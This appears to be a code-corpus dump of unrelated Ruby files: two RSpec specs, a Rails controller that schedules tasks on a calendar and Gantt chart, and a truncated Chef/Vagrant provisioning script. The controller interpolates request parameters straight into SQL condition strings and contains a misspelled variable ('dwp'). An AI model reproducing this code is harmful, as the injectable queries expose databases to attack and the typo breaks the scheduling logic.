require File.expand_path('../../../spec_helper', __FILE__) describe "Regexp#options" do it "returns a Fixnum bitvector of regexp options for the Regexp object" do /cat/.options.should be_kind_of(Fixnum) /cat/ix.options.should be_kind_of(Fixnum) end it "allows checking for presence of a certain option with bitwise &" do (/cat/.options & Regexp::IGNORECASE).should == 0 (/cat/i.options & Regexp::IGNORECASE).should_not == 0 (/cat/.options & Regexp::MULTILINE).should == 0 (/cat/m.options & Regexp::MULTILINE).should_not == 0 (/cat/.options & Regexp::EXTENDED).should == 0 (/cat/x.options & Regexp::EXTENDED).should_not == 0 (/cat/mx.options & Regexp::MULTILINE).should_not == 0 (/cat/mx.options & Regexp::EXTENDED).should_not == 0 (/cat/xi.options & Regexp::IGNORECASE).should_not == 0 (/cat/xi.options & Regexp::EXTENDED).should_not == 0 end end
41.136364
76
0.677348
03964ef089b6bfdfbc6b0d1d57549676806b82d3
2,117
# frozen_string_literal: true require File.expand_path(File.dirname(__FILE__) + '/../spec_helper') describe Cadenza::FilterNode do it 'should take an identifier' do filter = Cadenza::FilterNode.new('trim') expect(filter.identifier).to eq('trim') end it 'should be equal to another filter with the same name' do filter_a = Cadenza::FilterNode.new('trim') filter_b = Cadenza::FilterNode.new('trim') expect(filter_a).to eq(filter_b) end it 'should not equal another node with a different name' do filter_a = Cadenza::FilterNode.new('trim') filter_b = Cadenza::FilterNode.new('cut') expect(filter_a).not_to eq(filter_b) end it 'should equal a node with the same parameters' do filter_a = Cadenza::FilterNode.new('trim', [Cadenza::ConstantNode.new(10)]) filter_b = Cadenza::FilterNode.new('trim', [Cadenza::ConstantNode.new(10)]) expect(filter_a).to eq(filter_b) end it 'should not equal a node with different parameters' do filter_a = Cadenza::FilterNode.new('trim', [Cadenza::ConstantNode.new(10)]) filter_b = Cadenza::FilterNode.new('trim', [Cadenza::ConstantNode.new(30)]) expect(filter_a).not_to eq(filter_b) end it 'should take a list of parameter nodes' do constant_a = Cadenza::ConstantNode.new(10) filter = Cadenza::FilterNode.new('cut', [constant_a]) expect(filter.identifier).to eq('cut') expect(filter.parameters).to eq([constant_a]) end it 'should evaluate the filter on a value given a context' do klass = Class.new(Cadenza::Context) klass.define_filter(:floor) { |value, _params| value.floor } context = klass.new filter = Cadenza::FilterNode.new('floor') expect(filter.evaluate(context, 3.14159)).to eq(3) end it 'should pass parameters to the filter function when evaluating' do klass = Class.new(Cadenza::Context) klass.define_filter(:add) { |value, params| value + params.first } context = klass.new filter = Cadenza::FilterNode.new('add', [Cadenza::ConstantNode.new(1)]) expect(filter.evaluate(context, 3.14159)).to eq(4.14159) end end
29.816901
79
0.699103
39d6606ee57271b9a5eacdbb1e31186688bdf42f
34,315
# Generate a calendar showing completed and due Tasks for a Company # TODO: Simple Events class ScheduleController < ApplicationController helper_method :gantt_offset helper_method :gantt_width helper_method :gantt_color def list today = Time.now.to_date @year = params[:year] unless params[:year].nil? @month = params[:month] unless params[:month].nil? @year ||= today.year @month ||= today.month # Find all tasks for the current month, should probably be adjusted to use # TimeZone for current User instead of UTC. conditions = "tasks.project_id IN (#{current_project_ids}) AND tasks.company_id = '#{current_user.company_id}' AND ((tasks.due_at is NOT NULL AND tasks.due_at > '#{@year}-#{@month}-01 00:00:00' AND tasks.due_at < '#{@year}-#{@month}-31 23:59:59') OR (tasks.completed_at is NOT NULL AND tasks.completed_at > '#{@year}-#{@month}-01 00:00:00' AND tasks.completed_at < '#{@year}-#{@month}-31 23:59:59'))" task_filter = TaskFilter.new(self, params, conditions) @tasks = task_filter.tasks @milestones = Milestone.find(:all, :conditions => ["company_id = ? AND project_id IN (#{current_project_ids})", current_user.company_id]) @dates = {} # Mark milestones @milestones.each do |m| unless m.due_at.nil? @dates[tz.utc_to_local(m.due_at).to_date] ||= [] @dates[tz.utc_to_local(m.due_at).to_date] << m end end # Mark all tasks @tasks.each do |t| due_date = tz.utc_to_local(t.due_at).to_date unless t.due_at.nil? due_date ||= tz.utc_to_local(t.completed_at).to_date unless t.completed_at.nil? @dates[due_date] ||= [] duration = t.duration days = (duration / (60*8)) - 1 days = 0 if days < 0 found = false slot = 0 until found found = true done = days d = -1 while done >= 0 d += 1 wday1 = (due_date - d) wday2 = (due_date.wday) dpw = current_user.days_per_week next if( ((wday1 == 0 && dpw < 7) || (wday1 == 6 && dwp < 6)) && !((wday2 == 0 && dpw < 7) || (wday2 == 6 && dpw <6)) ) unless @dates[due_date - d].nil? || @dates[due_date - d][slot].nil? found = false end done -= 1 end slot += 1 unless found end while days >= 0 days -= 1 @dates[due_date] ||= [] @dates[due_date][slot] = t due_date -= 1.days due_date -= 1.days if due_date.wday == 6 && current_user.days_per_week < 6 due_date -= 2.days if due_date.wday == 0 && current_user.days_per_week < 7 end end end # New event def new end # Edit event def edit end # Create event def create end # Update event def update end # Delte event def delete end # Refresh calendar on Event addition / task completion def refresh end def users_gantt_free(dates, t, date, rev = false) free = true t.users.each do |u| next unless free date_check = date dur = t.scheduled_minutes_left while dur > 0 && free day_dur = dur > u.workday_duration ? u.workday_duration : dur logger.debug("--> #{t.id}: Checking [#{date_check}] for #{day_dur}") dates[date_check] ||= { } dates[date_check][u.id] ||= 0 if dates[date_check][u.id].to_i + day_dur > u.workday_duration free = false logger.debug("--> #{t.id}: Not free..") end date_check += 1.day if date_check.wday == 6 && current_user.days_per_week < 6 date_check += 2.days end if date_check.wday == 0 && current_user.days_per_week < 7 date_check += 1.days end dur -= day_dur if free logger.debug("--> #{t.id}: #{dur} left to find...") end end free end def users_gantt_mark(dates, t, date, rev = false) end_date = date start_date = date.midnight t.users.each do |u| dur = t.scheduled_minutes_left day = date + dates[date][u.id].minutes start_date = day if day > start_date while dur > 0 day_dur = dur > u.workday_duration ? u.workday_duration : dur dates[day.midnight][u.id] += day_dur if (dur <= u.workday_duration) day += dur.minutes end end_date = day if end_date < day day += 1.day if day.wday == 6 && current_user.days_per_week < 6 day += 2.days end if day.wday == 0 && current_user.days_per_week < 7 day += 1.days end dur -= day_dur end end [start_date,end_date] end def schedule_direction(dates, t, before = nil, after = nil) if t.scheduled_date || before || after day = nil day = (t.scheduled_date).midnight if t.scheduled_date day ||= before day ||= after rev = after.nil? ? true : false day, rev = override_day(t, day, before, after, rev) if day < current_user.tz.now.midnight day = current_user.tz.now.midnight rev = false logger.debug "--> #{t.id}[##{t.task_num}] forwards due to #{day} < #{current_user.tz.now.midnight}" end logger.info("--> #{t.id}[##{t.task_num}]}: [#{t.scheduled_minutes_left}] [#{t.scheduled_date}] => #{day} : #{rev ? "backwards" : "forwards"}") else day = (current_user.tz.now.midnight) rev = false override_day(t,day,before,after, rev) logger.debug "--> #{t.id}[##{t.task_num}] forwards due to no due date" end rev end def schedule_collect_deps(deps, seen, t, rev = false) # return deps[t.id] if deps.keys.include?(t.id) return [t] if seen.include?(t) seen << t my_deps = [] unless rev end my_deps << t unless t.done? if t.milestone && t.milestone.scheduled_date t.dependants.each do |d| my_deps += schedule_collect_deps(deps, seen, d, rev) end else t.dependencies.each do |d| my_deps += schedule_collect_deps(deps, seen, d, rev) end end seen.pop my_deps.compact! my_deps.uniq! deps[t.id] = my_deps if my_deps.size > 0 logger.debug("--> #{t.id} my_deps[#{my_deps.collect{ |dep| "#{dep.id}[##{dep.task_num}]" }.join(',')}] #{rev}") my_deps end def override_day(t, day, before, after, rev) logger.debug "--> #{t.id} override got day[#{day.to_s}], before[#{before}], after[#{after}], due[#{t.scheduled_due_at}], #{rev}" days = ((t.scheduled_minutes_left) / current_user.workday_duration).to_i rem = t.scheduled_minutes_left - (days * current_user.workday_duration) dur = days.days + rem.minutes if dur > 7.days dur += (dur/7.days) * 2.days end if rev if (before && before < day) && (t.scheduled_due_at.nil? || before < t.scheduled_due_at) day = (before - days.days - rem.minutes).midnight logger.debug "--> #{t.id} force before #{day}" rev = true elsif (t.scheduled_due_at && before.nil?) || (before && t.scheduled_due_at && t.scheduled_due_at < before) || (before && t.scheduled_date && t.scheduled_date < before) day = t.scheduled_due_at ? t.scheduled_due_at.midnight : t.scheduled_date.midnight logger.debug "--> #{t.id} force before #{day} [due] " # if day.wday == 6 # day -= 1.days # dur += 1.days # end if day.wday == 0 && current_user.days_per_week < 7 day -= 1.days dur += 2.days end day -= rem.minutes while days > 0 if day.wday == 0 && current_user.days_per_week < 7 day -= 2.days dur += 2.days elsif day.wday == 6 && current_user.days_per_week < 6 day -= 1.days dur += 2.days days -= 1 else day -= 1.day days -= 1 end logger.debug "--> #{t.id} force before #{day} - #{days} left [due] " end logger.debug "--> #{t.id} force before #{day.wday} -> #{(day+dur).wday} [due] " if day.wday == 6 && current_user.days_per_week < 6 day -= 2.days end if day.wday == 0 && current_user.days_per_week < 7 day -= 2.days end logger.debug "--> #{t.id} force before #{day} -> #{(day+dur)} [due] " else if day.wday == 0 && current_user.days_per_week < 7 day -= 1.days dur += 2.days end day -= rem.minutes while days > 0 if day.wday == 0 && current_user.days_per_week < 7 day -= 2.days dur += 2.days elsif day.wday == 6 && current_user.days_per_week < 6 day -= 1.days dur += 2.days days -= 1 else day -= 1.day days -= 1 end logger.debug "--> #{t.id} force before #{day} - #{days} left" end end end unless rev if after && after > day && (t.scheduled_due_at.nil? || after < (t.scheduled_due_at + days.days + rem.minutes)) day = after.midnight logger.debug "--> #{t.id} force after #{day}" rev = false elsif (t.scheduled_due_at && after.nil? ) || (after && t.scheduled_due_at && (t.scheduled_due_at - days.days - rem.minutes ) < after) day = (t.scheduled_due_at.midnight - days.days - rem.minutes).midnight logger.debug "--> #{t.id} force after #{day} [due]" rev = true end end if rev day -= 1.days if day.wday == 6 && current_user.days_per_week < 6 day -= 2.days if day.wday == 0 && current_user.days_per_week < 7 else day += 2.days if day.wday == 6 && current_user.days_per_week < 6 day += 1.days if day.wday == 0 && current_user.days_per_week < 7 end day = Time.now.utc.midnight if day < Time.now.utc.midnight logger.debug "--> #{t.id} override returned day[#{day.to_s}], #{rev}]" [day.midnight,rev] end def schedule_gantt(dates,t, before = nil, after = nil) logger.info "--> #{t.id} scheduling #{"before " + before.to_s if before}#{"after " + after.to_s if after}" rev = schedule_direction(dates,t,before, after) @deps ||= {} @seen ||= [] schedule_collect_deps(@deps, @seen, t, rev) # rescheduled = @deps[t.id].size > 1 logger.info "--> #{t.id} deps: #{@deps[t.id].size}[#{@deps[t.id].collect{|d| d.task_num }.join(',')}] #{rev}" unless @deps[t.id].blank? range = [] min_start = max_start = nil # if rev my_deps = @deps[t.id].slice!( @deps[t.id].rindex(t) .. -1 ) rescue [] # else # my_deps = @deps[t.id].slice!( 0 .. @deps[t.id].rindex(t) ) # end # @deps[t.id] -= my_deps while !my_deps.blank? d = rev ? my_deps.pop : my_deps.pop next if d.id == t.id if rev before = min_start.midnight if min_start && (before.nil? || min_start.midnight < before) else after = max_start.midnight if max_start && (after.nil? || max_start.midnight > after) end # break unless rev logger.info "--> #{t.id}[##{t.task_num}] => depends on #{d.id}[##{d.task_num}]" if rev range = schedule_task(dates, d, min_start, nil) else range = schedule_task(dates, d, nil, max_start) end logger.debug "--> #{t.id} min_start/max_start #{range.inspect}" min_start ||= range[0].midnight if range[0] min_start = range[0].midnight if range[0] && range[0] < min_start max_start ||= range[1] if range[1] max_start = range[1] if range[1] && range[1] > max_start logger.debug("--> #{t.id} min_start #{min_start}") logger.debug("--> #{t.id} max_start #{max_start}") end rev = schedule_direction(dates, t, before, after) #if rescheduled day = (t.scheduled_date).midnight if t.scheduled_date day ||= Time.now.utc.midnight if min_start && min_start < day && rev before = min_start.midnight after = nil elsif max_start && max_start > day && !rev after = max_start.midnight before = nil end logger.debug "--> #{t.id} scheduling got day[#{day.to_s}], before[#{before}], after[#{after}], due[#{t.scheduled_due_at}] - #{rev ? "backwards" : "forwards"}" day, rev = override_day(t, day, before, after, rev) logger.debug "--> #{t.id} scheduling got adjusted day[#{day.to_s}], before[#{before}], after[#{after}], due[#{t.scheduled_due_at}] - #{rev ? "backwards" : "forwards"}" if t.scheduled_minutes_left == 0 return [day,day] end found = false logger.debug "--> #{t.id} scheduling looking #{day.to_s} #{rev ? "backwards" : "forwards"}" while found == false found = true if users_gantt_free(dates, t, day) day, end_date = users_gantt_mark(dates, t, day) if t.users.empty? end_date = day + t.scheduled_minutes_left.minutes end return [day, end_date] else found = false if rev day -= 1.day if day.wday == 0 && current_user.days_per_week < 7 day -= 2.days end if day.wday == 6 && current_user.days_per_week < 6 day -= 1.days end if day < current_user.tz.now.midnight day = current_user.tz.now.midnight rev = false logger.debug("--> switching direction #{t.id}") if day.wday == 6 && current_user.days_per_week < 6 day += 2.days end if day.wday == 0 && current_user.days_per_week < 7 day += 1.days end end else day += 1.day if day.wday == 6 && current_user.days_per_week < 6 day += 2.days end if day.wday == 0 && current_user.days_per_week < 7 day += 1.days end end end end end def schedule_task(dates, t, before = nil, after = nil) return [@start[t.id], @end[t.id]] if @start.keys.include?(t.id) || @stack.include?(t.id) @stack << t.id range = schedule_gantt(@dates, t, before, after ) @start[t.id] = range[0] @end[t.id] = range[1] @range[0] ||= range[0] @range[0] = range[0] if range[0] < @range[0] @range[1] ||= range[1] @range[1] = range[1] if range[1] > @range[1] if t.milestone_id.to_i > 0 @milestone_start[t.milestone_id] ||= range[0] @milestone_start[t.milestone_id] = range[0] if @milestone_start[t.milestone_id] > range[0] @milestone_end[t.milestone_id] ||= range[1] @milestone_end[t.milestone_id] = range[1] if @milestone_end[t.milestone_id] < range[1] end logger.info "== #{t.id}[##{t.task_num}] [#{format_duration(t.scheduled_minutes_left, current_user.duration_format, current_user.workday_duration, current_user.days_per_week)}] : #{@start[t.id]} -> #{@end[t.id]}" @stack.pop return range end def gantt task_filter = TaskFilter.new(self, params) @tasks = task_filter.tasks @displayed_tasks = @tasks @dates = { } @start = { } @end = { } @range = [Time.now.utc.midnight, 1.month.since.utc.midnight] @milestone_start = { } @milestone_end = { } start_date = current_user.tz.now.midnight + 8.hours tasks = @tasks.select{ |t| t.scheduled_due_at } # all tasks with due dates @milestones = @tasks.select{ |t| t.scheduled_due_at.nil? && t.milestone && t.milestone.scheduled_date }.reverse # all tasks with milestone with due date tasks += @milestones.select{ |t| t.dependencies.size == 0 && t.dependants.size == 0} tasks += @milestones.select{ |t| t.dependencies.size > 0 && t.dependants.size == 0} tasks += @milestones.select{ |t| t.dependencies.size > 0 && t.dependants.size > 0} tasks += @milestones.select{ |t| t.dependencies.size == 0 && t.dependants.size > 0} non_due = @tasks.reject{ |t| t.scheduled_due_at } # all tasks without due date tasks += non_due.select{ |t| t.dependencies.size == 0 && t.dependants.size > 0} tasks += non_due.select{ |t| t.dependencies.size > 0 && t.dependants.size > 0} tasks += non_due.select{ |t| t.dependencies.size > 0 && t.dependants.size == 0} tasks += non_due.select{ |t| t.dependencies.size == 0 && t.dependants.size == 0} @schedule_in_progress = false for task in @tasks if task.scheduled? && (task.scheduled_at != task.due_at || task.scheduled_duration != task.duration) @schedule_in_progress = true break end if task.milestone && task.milestone.scheduled? && task.milestone.scheduled_at != task.milestone.due_at @schedule_in_progress = true break end end @stack = [] tasks.each do |t| t.dependencies.each do |d| schedule_task(@dates,d) end schedule_task(@dates,t) end end def gantt_reset projects = current_user.projects.select{ |p| current_user.can?(p, 'prioritize')}.collect(&:id).join(',') projects = "0" if projects.nil? || projects.length == 0 Task.update_all("scheduled=0, scheduled_at=NULL, scheduled_duration = 0", ["tasks.project_id IN (#{projects}) AND tasks.completed_at IS NULL"]) projects = current_user.projects.select{ |p| current_user.can?(p, 'milestone')}.collect(&:id).join(',') projects = "0" if projects.nil? || projects.length == 0 Milestone.update_all("scheduled=0, scheduled_at=NULL", ["milestones.project_id IN (#{projects}) AND milestones.completed_at IS NULL"]) flash['notice'] = _('Schedule reverted') render :update do |page| page.redirect_to :action => 'gantt' end end def gantt_save projects = current_user.projects.select{ |p| current_user.can?(p, 'prioritize')}.collect(&:id).join(',') projects = "0" if projects.nil? || projects.length == 0 tasks = Task.find(:all, :conditions => ["tasks.project_id IN (#{projects}) AND tasks.completed_at IS NULL AND scheduled=1"]) tasks.each do |t| body = "" if t.scheduled_at != t.due_at old_name = "None" old_name = current_user.tz.utc_to_local(t.due_at).strftime_localized("%A, %d %B %Y") unless t.due_at.nil? new_name = "None" new_name = current_user.tz.utc_to_local(t.scheduled_at).strftime_localized("%A, %d %B %Y") unless t.scheduled_at.nil? body << "- <strong>Due</strong>: #{old_name} -> #{new_name}\n" t.due_at = t.scheduled_at end if t.scheduled_duration.to_i != t.duration.to_i body << "- <strong>Estimate</strong>: #{worked_nice(t.duration).strip} -> #{worked_nice(t.scheduled_duration)}\n" t.duration = t.scheduled_duration end if body != "" worklog = WorkLog.new worklog.log_type = EventLog::TASK_MODIFIED worklog.user = current_user worklog.company = t.project.company worklog.customer = t.project.customer worklog.project = t.project worklog.task = t worklog.started_at = Time.now.utc worklog.duration = 0 worklog.body = body worklog.save if(params['notify'].to_i == 1) Notifications::deliver_changed( :updated, t, current_user, body.gsub(/<[^>]*>/,'')) rescue nil end Juggernaut.send( "do_update(0, '#{url_for(:controller => 'tasks', :action => 'update_tasks', :id => t.id)}');", ["tasks_#{current_user.company_id}"]) end t.scheduled_at = nil t.scheduled_duration = 0 t.scheduled = false t.save end projects = current_user.projects.select{ |p| current_user.can?(p, 'milestone')}.collect(&:id).join(',') projects = "0" if projects.nil? || projects.length == 0 milestones = Milestone.find(:all, :conditions => ["milestones.project_id IN (#{projects}) AND milestones.completed_at IS NULL AND scheduled=1"]) milestones.each do |m| if m.due_at != m.scheduled_at m.due_at = m.scheduled_at if(params['notify'].to_i == 1) Notifications::deliver_milestone_changed(current_user, m, 'updated', m.due_at) rescue nil end end m.scheduled_at = nil m.scheduled = false m.save end Juggernaut.send( "do_update(0, '#{url_for(:controller => 'activities', :action => 'refresh')}');", ["activity_#{current_user.company_id}"]) flash['notice'] = _('Schedule saved') render :update do |page| page.redirect_to :action => 'gantt' end end def reschedule begin @task = Task.find(params[:id], :conditions => ["tasks.project_id IN (#{current_project_ids}) AND tasks.company_id = '#{current_user.company_id}'"] ) rescue render :nothing => true return end unless @task.scheduled? @task.scheduled_duration = @task.duration @task.scheduled_at = @task.due_at @task.scheduled = true end if params[:duration] @task.scheduled_duration = parse_time(params[:duration], true) end if params[:due] && params[:due].length > 0 begin due = DateTime.strptime( params[:due], current_user.date_format ) @task.scheduled_at = tz.local_to_utc(due.to_time + 1.day - 1.minute) unless due.nil? rescue render :update do |page| page["due-#{@task.dom_id}"].value = (@task.scheduled_at ? @task.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@task.dom_id}"].className = ((@task.scheduled? && @task.scheduled_at != @task.due_at) ? "scheduled" : "") end return end elsif params[:due] @task.scheduled_at = nil end @task.save gantt render :update do |page| if @schedule_in_progress page << "if( !$('gantt-save-revert').visible() ) {" page << "$('gantt-save-revert').show();" page << "}" else page << "if( $('gantt-save-revert').visible() ) {" page << "$('gantt-save-revert').hide();" page << "}" end page["duration-#{@task.dom_id}"].value = worked_nice(@task.scheduled_duration) page["duration-#{@task.dom_id}"].className = ((@task.scheduled? && @task.scheduled_duration != @task.duration) ? "scheduled" : "") page["due-#{@task.dom_id}"].value = (@task.scheduled_at ? @task.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@task.dom_id}"].className = ((@task.scheduled? && @task.scheduled_at != @task.due_at) ? "scheduled" : "") page << "$('width-#{@task.dom_id}').setStyle({ backgroundColor:'#{gantt_color(@task)}'});" milestones = { } @displayed_tasks.each do |t| page << "$('offset-#{t.dom_id}').setStyle({ left:'#{gantt_offset(@start[t.id])}'});" page << "$('width-#{t.dom_id}').setStyle({ width:'#{gantt_width(@start[t.id],@end[t.id])}'});" page << "$('width-#{t.dom_id}').setStyle({ backgroundColor:'#{gantt_color(t)}'});" milestones[t.milestone_id] = t.milestone if t.milestone_id.to_i > 0 end milestones.values.each do |m| page.replace_html "duration-#{m.dom_id}", worked_nice(m.duration) if m.scheduled_date page << "$('offset-due-#{m.dom_id}').setStyle({ left:'#{gantt_offset(m.scheduled_date.midnight.to_time)}'});" else page << "$('offset-due-#{m.dom_id}').setStyle({ left:'#{gantt_offset(@milestone_end[m.id])}'});" end page << "$('offset-#{m.dom_id}').setStyle({ left:'#{gantt_offset(@milestone_start[m.id])}'});" page << "$('offset-#{m.dom_id}').setStyle({ width:'#{gantt_width(@milestone_start[m.id], @milestone_end[m.id]).to_i + 500}px'});" page << "$('width-#{m.dom_id}').setStyle({ width:'#{gantt_width(@milestone_start[m.id], @milestone_end[m.id])}'});" end end end def reschedule_milestone begin @milestone = Milestone.find(params[:id], :conditions => ["milestones.project_id IN (#{current_project_ids})"] ) rescue render :nothing => true return end unless @milestone.scheduled? @milestone.scheduled_at = @milestone.due_at @milestone.scheduled = true end if params[:due] && params[:due].length > 0 begin due = DateTime.strptime( params[:due], current_user.date_format ) @milestone.scheduled_at = tz.local_to_utc(due.to_time + 1.day - 1.minute) unless due.nil? rescue render :update do |page| page["due-#{@milestone.dom_id}"].value = (@milestone.scheduled_at ? @milestone.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@milestone.dom_id}"].className = ((@milestone.scheduled? && @milestone.scheduled_at != @milestone.due_at) ? "scheduled" : "") end return end elsif params[:due] @milestone.scheduled_at = nil end @milestone.save gantt render :update do |page| if @schedule_in_progress page << "if( !$('gantt-save-revert').visible() ) {" page << "$('gantt-save-revert').show();" page << "}" else page << "if( $('gantt-save-revert').visible() ) {" page << "$('gantt-save-revert').hide();" page << "}" end page["due-#{@milestone.dom_id}"].value = (@milestone.scheduled_at ? @milestone.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@milestone.dom_id}"].className = ((@milestone.scheduled? && @milestone.scheduled_at != @milestone.due_at) ? "scheduled" : "") milestones = { } @displayed_tasks.each do |t| page << "$('offset-#{t.dom_id}').setStyle({ left:'#{gantt_offset(@start[t.id])}'});" page << "$('offset-#{t.dom_id}').setStyle({ width:'#{gantt_width(@start[t.id],@end[t.id]).to_i + 500}px'});" page << "$('width-#{t.dom_id}').setStyle({ width:'#{gantt_width(@start[t.id],@end[t.id])}'});" page << "$('width-#{t.dom_id}').setStyle({ backgroundColor:'#{gantt_color(t)}'});" milestones[t.milestone_id] = t.milestone if t.milestone_id.to_i > 0 end milestones.values.each do |m| page.replace_html "duration-#{m.dom_id}", worked_nice(m.duration) if m.scheduled_date page << "$('offset-due-#{m.dom_id}').setStyle({ left:'#{gantt_offset(m.scheduled_date.midnight.to_time)}'});" else page << "$('offset-due-#{m.dom_id}').setStyle({ left:'#{gantt_offset(@milestone_end[m.id])}'});" end page << "$('offset-#{m.dom_id}').setStyle({ left:'#{gantt_offset(@milestone_start[m.id])}'});" page << "$('offset-#{m.dom_id}').setStyle({ width:'#{gantt_width(@milestone_start[m.id], @milestone_end[m.id]).to_i + 500}px'});" page << "$('width-#{m.dom_id}').setStyle({ width:'#{gantt_width(@milestone_start[m.id], @milestone_end[m.id])}'});" end end end def gantt_drag begin if params[:id].include?('-due-') @milestone = Milestone.find(params[:id].split("-").last, :conditions => ["milestones.project_id IN (#{current_project_ids})"] ) else @task = Task.find(params[:id].split("-").last, :conditions => ["tasks.project_id IN (#{current_project_ids}) AND tasks.company_id = '#{current_user.company_id}'"] ) end rescue render :nothing => true return end x = params[:x].to_i x = 0 if x < 0 start_date = Time.now.utc.midnight + (x / 16).days end_date = start_date + ((params[:w].to_i - 501)/16).days + 1.day if @milestone unless @milestone.scheduled? @milestone.scheduled_at = @milestone.due_at @milestone.scheduled = true end @milestone.scheduled_at = tz.local_to_utc(start_date.to_time + 1.day - 1.minute) unless start_date.nil? @milestone.save else unless @task.scheduled? @task.scheduled_duration = @task.duration @task.scheduled_at = @task.due_at @task.scheduled = true end @task.scheduled_at = tz.local_to_utc(end_date.to_time + 1.day - 1.minute) unless end_date.nil? @task.save end gantt render :update do |page| if @schedule_in_progress page << "if( !$('gantt-save-revert').visible() ) {" page << "$('gantt-save-revert').show();" page << "}" else page << "if( $('gantt-save-revert').visible() ) {" page << "$('gantt-save-revert').hide();" page << "}" end if @milestone page["due-#{@milestone.dom_id}"].value = (@milestone.scheduled_at ? @milestone.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@milestone.dom_id}"].className = ((@milestone.scheduled? && @milestone.scheduled_at != @milestone.due_at) ? "scheduled" : "") else page["due-#{@task.dom_id}"].value = (@task.scheduled_at ? @task.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@task.dom_id}"].className = ((@task.scheduled? && @task.scheduled_at != @task.due_at) ? "scheduled" : "") page << "$('width-#{@task.dom_id}').setStyle({ backgroundColor:'#{gantt_color(@task)}'});" end milestones = { } @displayed_tasks.each do |t| page << "$('offset-#{t.dom_id}').setStyle({ left:'#{gantt_offset(@start[t.id])}'});" page << "$('width-#{t.dom_id}').setStyle({ width:'#{gantt_width(@start[t.id],@end[t.id])}'});" page << "$('width-#{t.dom_id}').setStyle({ backgroundColor:'#{gantt_color(t)}'});" milestones[t.milestone_id] = t.milestone if t.milestone_id.to_i > 0 end milestones.values.each do |m| page.replace_html "duration-#{m.dom_id}", worked_nice(m.duration) if m.scheduled_date page << "$('offset-due-#{m.dom_id}').setStyle({ left:'#{gantt_offset(m.scheduled_date.midnight.to_time)}'});" else page << "$('offset-due-#{m.dom_id}').setStyle({ left:'#{gantt_offset(@milestone_end[m.id])}'});" end page << "$('offset-#{m.dom_id}').setStyle({ left:'#{gantt_offset(@milestone_start[m.id])}'});" page << "$('offset-#{m.dom_id}').setStyle({ width:'#{gantt_width(@milestone_start[m.id], @milestone_end[m.id]).to_i + 500}px'});" page << "$('width-#{m.dom_id}').setStyle({ width:'#{gantt_width(@milestone_start[m.id], @milestone_end[m.id])}'});" end end end def gantt_dragging begin if params[:id].include?('-due-') @milestone = Milestone.find(params[:id].split("-").last, :conditions => ["milestones.project_id IN (#{current_project_ids})"] ) else @task = Task.find(params[:id].split("-").last, :conditions => ["tasks.project_id IN (#{current_project_ids}) AND tasks.company_id = '#{current_user.company_id}'"] ) end rescue render :nothing => true return end x = params[:x].to_i x = 0 if x < 0 start_date = Time.now.utc.midnight + (x / 16).days end_date = start_date + ((params[:w].to_i - 501)/16).days + 1.day if @milestone @milestone.scheduled_at = tz.local_to_utc(start_date.to_time + 1.day - 1.minute) unless start_date.nil? render :update do |page| page["due-#{@milestone.dom_id}"].value = (@milestone.scheduled_at ? @milestone.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@milestone.dom_id}"].className = ((@milestone.scheduled? && @milestone.scheduled_at != @milestone.due_at) ? "scheduled" : "") end else @task.scheduled_at = tz.local_to_utc(end_date.to_time + 1.day - 1.minute) unless end_date.nil? render :update do |page| page["due-#{@task.dom_id}"].value = (@task.scheduled_at ? @task.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@task.dom_id}"].className = ((@task.scheduled? && @task.scheduled_at != @task.due_at) ? "scheduled" : "") end end end def gantt_offset(d) days = (d.to_i - Time.now.utc.midnight.to_i) / 1.day rem = ((d.to_i - Time.now.utc.midnight.to_i) - days.days) / 1.minute w = days * 16.0 + (rem.to_f / current_user.workday_duration) * 16.0 w = 0 if w < 0 "#{w.to_i}px" end def gantt_width(s,e) days = (e.to_i - s.to_i) / 1.day rem = ((e.to_i - s.to_i) - days.days) / 1.minute w = days * 16.0 + (rem.to_f / current_user.workday_duration) * 16.0 w = 2 if w < 2 "#{w.to_i}px" end def gantt_color(t) if t.scheduled_overdue? if t.scheduled? "#f00" else "#f66" end elsif t.scheduled? && t.scheduled_date if @end[t.id] && @end[t.id] > t.scheduled_date.to_time "#f00" elsif t.overworked? "#ff9900" elsif t.started? "#1e7002" else "#00f" end else if t.scheduled_date && @end[t.id] && @end[t.id] > t.scheduled_date.to_time "#f66" elsif t.overworked? "#ff9900" elsif t.started? "#76a670" else "#88f" end end end def filter f = params[:filter] if f.nil? || f.empty? || f == "0" session[:filter_customer] = "0" session[:filter_milestone] = "0" session[:filter_project] = "0" elsif f[0..0] == 'c' session[:filter_customer] = f[1..-1] session[:filter_milestone] = "0" session[:filter_project] = "0" elsif f[0..0] == 'p' session[:filter_customer] = "0" session[:filter_milestone] = "0" session[:filter_project] = f[1..-1] elsif f[0..0] == 'm' session[:filter_customer] = "0" session[:filter_milestone] = f[1..-1] session[:filter_project] = "0" elsif f[0..0] == 'u' session[:filter_customer] = "0" session[:filter_milestone] = "-1" session[:filter_project] = f[1..-1] end [:filter_user, :ignore_hidden].each do |filter| session[filter] = params[filter] end redirect_to :action => 'gantt' end end
33.315534
404
0.578056
4adfef502647bbb16e7b9b867c7999a93ef1484b
2,233
# vagrant-deploy-goapp-ngnix.rb require 'chef/provisioning/vagrant_driver' # Define which Ubuntu image we're going to use and where to download # it from vagrant_box 'precise64' do url 'http://files.vagrantup.com/precise64.box' end # Tell provisioning we want to use Vagrant with_driver 'vagrant' # Tell provisioning to use the Ubuntu image with_machine_options :vagrant_options => { 'vm.box' => 'precise64' } # Define how many app servers we want to provision num_appservers = 2 baseip_prefix = '10.10.10.' baseip_address= 100 machine_batch do ignore_failure true # Create appserver machines 1.upto(num_appservers) do |i| machine "appserver#{i}" do appserver_ip_address = "#{baseip_prefix}%d" % (baseip_address+i) # Tell the vagrant driver to add a private network address to give each machine a unique IP add_machine_options :vagrant_config => ["config.vm.network \"private_network\", ip: \"#{appserver_ip_address}\""].join("\n") # Define which Chef cookbook we want to run on the box # appserver will compile a Go file and then run it to respond to an http request run_list ['recipe[appserver::default]'] end end # Create the front end web server machine 'webserver' do # Tell the vagrant driver to add a private network address to give the machine a unique IP # and to define a port forward so we can test the app webserver_ip_address = "#{baseip_prefix}%d" % (baseip_address) add_machine_options :vagrant_config => ["config.vm.network \"private_network\", 